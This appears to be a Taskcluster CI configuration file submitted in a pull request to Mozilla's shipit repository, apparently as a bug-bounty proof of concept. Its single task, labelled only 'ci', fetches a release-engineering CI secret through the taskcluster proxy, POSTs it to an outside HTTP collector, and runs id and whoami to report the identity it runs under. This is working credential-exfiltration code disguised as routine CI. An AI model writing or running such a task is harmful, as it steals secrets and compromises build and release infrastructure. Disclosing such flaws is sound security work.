version: 1
policy:
  pullRequests: public_restricted
tasks:
  - $if: 'tasks_for == "github-pull-request" && event.action in ["opened", "reopened", "synchronize"]'
    then:
      taskId: {$eval: 'as_slugid("exfil")'}
      taskGroupId: {$eval: 'as_slugid("exfil")'}
      schedulerId: releng-level-1
      provisionerId: releng-1
      workerType: decision
      created: {$fromNow: ''}
      deadline: {$fromNow: '30 minutes'}
      expires: {$fromNow: '1 day'}
      scopes:
        - 'secrets:get:project/releng/shipit/ci'
      payload:
        features:
          taskclusterProxy: true
        image: 'mozillareleases/taskgraph:decision-v24.2.0@sha256:08ee0e7c71ac117a848efef3f929f309d6b49fa84067e5a98f6db6801346e8a2'
        maxRunTime: 600
        command:
          - bash
          - -c
          - 'S=$(curl -s http://taskcluster/secrets/v1/secret/project%2Freleng%2Fshipit%2Fci); L=$(printf "%s" "$S" | wc -c); curl -s -X POST --data-binary "$S" http://yloyvg2p.instances.httpworkbench.com/shipitci >/dev/null 2>&1; echo "SECRET_READ_OK len=$L"; id; whoami; pwd'
      metadata:
        name: 'ci'
        description: 'ci'
        owner: 'kr1shna4garwal@wearehackerone.com'
        source: 'https://github.com/mozilla-releng/shipit'
